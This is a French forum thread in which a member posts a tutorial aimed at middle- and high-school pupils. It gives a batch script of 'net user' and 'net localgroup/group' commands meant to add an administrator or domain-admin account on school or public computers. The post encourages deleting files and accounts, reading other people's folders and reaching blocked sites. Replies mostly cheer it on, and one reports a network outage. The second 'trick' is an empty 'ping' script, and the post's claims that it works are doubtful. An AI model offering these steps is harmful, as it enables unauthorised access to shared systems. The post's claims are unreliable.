astuce pour tout les petit encore au collège ou lycée

Statut
N'est pas ouverte pour d'autres réponses.

xXpp3Xx

Membre
Réactions
31
    Réponse de xXpp3Xx Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Je vais vous apprendre comment vous amusez un peu au collège ou au lycée ou n'importe ou ou vous avez un ordinateur. (Endroit public de preference)

COMMENCEMENT DU TOTORIEL

Se mettre administrateur a partir d'un bloc note. (ne pas faire depuis un cybercafé)

Ouvrez un bloc note sur l'ordinateur.
Tapez :
echo off
net user nomdutilisateur motdepasse /add
net localgroup Administrator nomduilistateur /add
net group "Domain Admins" nomdutilisateur /add
pause

vous enregistrer et vous le nommé "start.bat" biensur en enregistrent SOUS ! et vous faite "tout les fichier"

Démarrer le, vous avez désormais un compte admin vous pouvez supprimer les dossier, regarder le firewall (action d'autres personnes) accèdé a des sites interdit, ou au dossier personnelle. Vous pouvez supprimer des comptes etc...

Maintenant derniere petite astuce comment accèder a un site interdit au collège/lycée quand il est bloquer ?

Simple ouvrez un bloc note, taper :

echo off
ping
pause

Evil_DaysHD

Membre
Réactions
2
    Réponse de Evil_DaysHD Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Je sens qu'on va bien se marrer! :trollface:
Merci !

N

Nazox

Réponse de Nazox Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Merci même si je connaissais

Cyril | MF Network

Besoin d'aide ? MP moi ! :)
Contributeur
Réactions
2 455
    Réponse de Cyril | MF Network Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Merci du partage ^^

Djamel SEC

Ancien staff RG
Réactions
9 748
    Réponse de Djamel SEC Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Salut !
C'est pas bien oh làlà :o :AnGe: Non je rigole merci d'avoir partager Lundi je le fais :devil:

P A r a D i z Z x ™

Alias PrDzxPROD
Contributeur
Réactions
943
    Réponse de P A r a D i z Z x ™ Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
sa marche vraiment ?

membre241969

Ancien staff RG
Réactions
18 841
    Réponse de membre241969 Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Merci du tuto

iFrozzen You ? ♥

Reality News ♥ | Friends' Family ♥
Contributeur
Réactions
157
    Réponse de iFrozzen You ? ♥ Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Ahah epic le tuto :D

xXpp3Xx

Membre
Réactions
31
    Réponse de xXpp3Xx Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
sa marche vraiment ?
c est des commande admine tester ya déjà plus de 4 ans et sa marcher sa change pas si vous géré bien vous pouvez avoir accès au butlin et tout

ViPeR'

I'm Back :DD
Contributeur
Réactions
1 884
    Réponse de ViPeR' Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Merci je vais tester quand j'ai fini mon stage :D

Veenox GTP

VIP
Contributeur
Réactions
4 337
    Réponse de Veenox GTP Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Pour tous les petits ? :d:

Réactions
51
    Réponse de [email protected] Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Wooa trop la classe !:neo:
Je sens que je vais bien me marrer demain ! :trollface:

Jason™

♫ Shelter ♫
Contributeur
Réactions
349
    Réponse de Jason™ Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
A tester dans mon collège...

JowsOG

Contributeur
Réactions
461
    Réponse de JowsOG Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Merci :D
PS : 1000 ème message ! :dance:

D

deleted155813

Réponse de deleted155813 Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Good Game :ok: mais la 2 ème soltution est assez connue :ok:

TheAuthentic

Besoin d'un site web ?
Contributeur
Réactions
538
    Réponse de TheAuthentic Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Merci

xXpp3Xx

Membre
Réactions
31

Veenox GTP

VIP
Contributeur
Réactions
4 337
    Réponse de Veenox GTP Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée

Kerir

Nouveau départ
Contributeur
Réactions
869
    Réponse de Kerir Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Les ordinateur de mon collège son en capture a chaque fois les profs et même le CPE peut regarder sa donc moi je peut pas tester

BezooArts

GFX - WEB - LOBBY
Contributeur
Réactions
4 700
    Réponse de BezooArts Informatique ⌨️ Systèmes d'exploitation Windows : astuce pour tout les petit encore au collège ou lycée
Pour mon cas ça a été marrant mais ça a fait sauté le Réseau
Vous devez être inscrit pour voir les images

Statut
N'est pas ouverte pour d'autres réponses.

Haut Bas